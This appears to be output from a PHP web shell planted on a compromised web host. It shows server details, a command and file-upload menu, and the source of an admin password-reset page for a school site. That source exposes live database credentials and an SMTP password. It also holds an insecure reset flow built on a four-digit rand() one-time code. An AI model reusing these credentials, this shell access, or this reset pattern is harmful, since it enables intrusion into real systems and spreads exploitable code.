|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/domains/vethathirimaharishismartschool.com/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php session_start();
ob_start();
$connect=mysqli_connect('localhost','u915722082_ccusiitm','db@TDS2023','u915722082_ccusiitm');
if(isset($_POST['submit'])){
$email=$_POST['email'];
$pwd=password_hash(mysqli_real_escape_string($connect,$_POST['pwd']),PASSWORD_DEFAULT);
$otp=rand(1000,9999);
require 'phpmailer/PHPMailerAutoload.php';
//Create an instance; passing `true` enables exceptions
$mail = new PHPMailer;
try {
//Server settings
$mail->SMTPDebug = 0; //Enable verbose debug output
$mail->isSMTP(); //Send using SMTP
$mail->Host = 'mail.ccusiitm.com'; //Set the SMTP server to send through
$mail->SMTPAuth = true; //Enable SMTP authentication
$mail->Username = 'no-reply@ccusiitm.com'; //SMTP username
$mail->Password = '2zBXR5[G;q!['; //SMTP password
$mail->SMTPSecure = "ssl"; //Enable implicit TLS encryption
$mail->Port = 465; //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`
//Recipients
$mail->setFrom('no-reply@ccusiitm.com', 'demo mail');
$mail->addAddress($email); //Add a recipient
//Attachments
//Content
$mail->isHTML(true); //Set email format to HTML
$mail->Subject = 'ccusiitm';
$mail->Body = $otp;
$mail->AltBody = 'This is the body in plain text for non-HTML mail clients';
$mail->send();
$_SESSION['email']=$email;
$_SESSION['otp']=$otp;
$_SESSION['pwd']=$pwd;
header('location:otps.php');
} catch (Exception $e) {
echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}";
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="description" content="Neon Admin Panel" />
<meta name="author" content="" />
<link rel="shortcut icon" href="../assets/img/favicon.ico" type="image/x-icon" />
<title>CCUS|Admin</title>
<link rel="stylesheet" href="assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css">
<link rel="stylesheet" href="assets/css/font-icons/entypo/css/entypo.css">
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto+Sans:400,700,400italic">
<link rel="stylesheet" href="assets/css/bootstrap.css">
<link rel="stylesheet" href="assets/css/neon-core.css">
<link rel="stylesheet" href="assets/css/neon-theme.css">
<link rel="stylesheet" href="assets/css/neon-forms.css">
<link rel="stylesheet" href="assets/css/custom.css">
<script src="assets/js/jquery-1.11.3.min.js"></script>
<!--[if lt IE 9]><script src="assets/js/ie8-responsive-file-warning.js"></script><![endif]-->
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body class="page-body login-page login-form-fall" data-url="http://neon.dev">
<!-- This is needed when you send requests via Ajax -->
<script type="text/javascript">
var baseurl = '';
</script>
<div class="login-container">
<div class="login-header login-caret">
<div class="login-content">
<a href="index.html" class="logo">
<img src="assets/img/logo.svg" width="320" alt="" />
</a>
<p class="description">Dear user, log in to access the admin area!</p>
<!-- progress bar indicator -->
<div class="login-progressbar-indicator">
<h3>43%</h3>
<span>logging in...</span>
</div>
</div>
</div>
<div class="login-progressbar">
<div></div>
</div>
<div class="login-form">
<div class="login-content">
<div class="form-login-error">
<h3>Invalid login</h3>
<p>Enter <strong>demo</strong>/<strong>demo</strong> as login and password.</p>
</div>
<form method="POST" role="form" action='forgetpassword.php'>
<div class="form-group">
<div class="input-group">
<div class="input-group-addon">
<i class="entypo-user"></i>
</div>
<input type="email" class="form-control" name="email" id="username" placeholder="Email" autocomplete="off" />
</div>
</div>
<div class="form-group">
<div class="input-group">
<div class="input-group-addon">
<i class="entypo-key"></i>
</div>
<input type="password" class="form-control" name="pwd" id="password" placeholder="newpassword" autocomplete="off" />
</div>
</div>
<div class="form-group">
<button type="submit" class="btn btn-primary btn-block btn-login" name='submit'>
<i class="entypo-login"></i>
Submit
</button>
</div>
<!-- Implemented in v1.1.4 -->
<!--
You can also use other social network buttons
<div class="form-group">
<button type="button" class="btn btn-default btn-lg btn-block btn-icon icon-left twitter-button">
Login with Twitter
<i class="entypo-twitter"></i>
</button>
</div>
<div class="form-group">
<button type="button" class="btn btn-default btn-lg btn-block btn-icon icon-left google-button">
Login with Google+
<i class="entypo-gplus"></i>
</button>
</div> -->
</form>
<div class="login-bottom-links">
<a href="index.php" class="link">Login</a>
<br />
</div>
</div>
<div class="login-bottom-links p-0 m-0 col-12">
<div class="text-center padding-t-3">
<div class="copyright">
<p>
© CCUSIITM 2022 All Right Reseved. Developed by <i class="entypo-heart" style='color:red;'></i><a target="_blank" href="https://thedotstudios.com/"><span style='color:#949494'>TheDotStudios.com</span></a>. <br />
</p>
</div>
</div>
</div>
</div>
</div>
<!-- Bottom scripts (common) -->
<script src="assets/js/gsap/TweenMax.min.js"></script>
<script src="assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js"></script>
<script src="assets/js/bootstrap.js"></script>
<script src="assets/js/joinable.js"></script>
<script src="assets/js/resizeable.js"></script>
<script src="assets/js/neon-api.js"></script>
<script src="assets/js/jquery.validate.min.js"></script>
<script src="assets/js/neon-login.js"></script>
<!-- JavaScripts initializations and stuff -->
<script src="assets/js/neon-custom.js"></script>
<!-- Demo Settings -->
<script src="assets/js/neon-demo.js"></script>
</body>
</html>